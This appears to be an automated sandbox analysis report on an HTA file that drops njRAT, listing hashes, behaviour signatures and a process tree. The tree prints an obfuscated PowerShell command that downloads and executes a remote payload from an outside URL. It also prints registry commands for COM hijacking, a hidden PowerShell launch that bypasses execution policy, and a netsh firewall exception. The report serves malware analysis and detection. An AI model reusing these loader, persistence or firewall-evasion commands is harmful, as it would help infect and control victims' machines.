Analysis
-
max time kernel
146s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20220722-en, locale:en-us, os:windows10-2004-x64, system -
submitted
09-08-2022 19:09
Static task
static1
Behavioral task
behavioral1
Sample
enc.hta
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
enc.hta
Resource
win10v2004-20220722-en
General
-
Target
enc.hta
-
Size
4KB
-
MD5
a22a14258d33638343e40b4ef674b06d
-
SHA1
172a63be58e0a1c0d4a4b0a933d74b6af9164ddc
-
SHA256
5ea0ac297ec8f31acc2fa0c4475d2bcf044b2699e2417a8aa650d1b742ade518
-
SHA512
eb1c994e51bb36dbbbe54e64d642276e6924d332611c072ef215ff0cd17439187ca15467f1848526a1fd9c279b96c4cd2446e83fd992eb94c58daa965a1eda58
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exe, POWERSHELL.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4064 | 3404 | POWERSHELL.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2172 | 3404 | POWERSHELL.exe |
-
Blocklisted process makes network request 1 IoCs
Processes:
POWERSHELL.exe
flow | pid | process
14 | 4064 | POWERSHELL.exe
-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exe
description | pid | process | target process
PID 580 set thread context of 2168 | 580 | powershell.exe | aspnet_compiler.exe
-
Modifies registry class 4 IoCs
Processes:
reg.exe, reg.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POWERSHELL.exe, powershell.exe, POWERSHELL.exe, powershell.exe
pid | process
4064 | POWERSHELL.exe
4064 | POWERSHELL.exe
4072 | powershell.exe
4072 | powershell.exe
2172 | POWERSHELL.exe
2172 | POWERSHELL.exe
580 | powershell.exe
580 | powershell.exe
580 | powershell.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exe, powershell.exe, POWERSHELL.exe, cmd.exe, cmd.exe, powershell.exe, aspnet_compiler.exe
description | pid | process | target process
PID 4064 wrote to memory of 4072 | 4064 | POWERSHELL.exe | powershell.exe
PID 4064 wrote to memory of 4072 | 4064 | POWERSHELL.exe | powershell.exe
PID 4072 wrote to memory of 1640 | 4072 | powershell.exe | WScript.exe
PID 4072 wrote to memory of 1640 | 4072 | powershell.exe | WScript.exe
PID 2172 wrote to memory of 3496 | 2172 | POWERSHELL.exe | cmd.exe
PID 2172 wrote to memory of 3496 | 2172 | POWERSHELL.exe | cmd.exe
PID 3496 wrote to memory of 1712 | 3496 | cmd.exe | reg.exe
PID 3496 wrote to memory of 1712 | 3496 | cmd.exe | reg.exe
PID 3496 wrote to memory of 1668 | 3496 | cmd.exe | reg.exe
PID 3496 wrote to memory of 1668 | 3496 | cmd.exe | reg.exe
PID 3496 wrote to memory of 1956 | 3496 | cmd.exe | cmd.exe
PID 3496 wrote to memory of 1956 | 3496 | cmd.exe | cmd.exe
PID 1956 wrote to memory of 580 | 1956 | cmd.exe | powershell.exe
PID 1956 wrote to memory of 580 | 1956 | cmd.exe | powershell.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 580 wrote to memory of 2168 | 580 | powershell.exe | aspnet_compiler.exe
PID 2168 wrote to memory of 4800 | 2168 | aspnet_compiler.exe | netsh.exe
PID 2168 wrote to memory of 4800 | 2168 | aspnet_compiler.exe | netsh.exe
PID 2168 wrote to memory of 4800 | 2168 | aspnet_compiler.exe | netsh.exe
Processes
-
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} 1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<1@.W1@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$tR3=#_^2&^&=4$[-(8[8$ #127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 
'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs" 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat 1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat"" 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f 3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f 3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'" 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'" 4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE 6⤵
- Modifies Windows Firewall
Downloads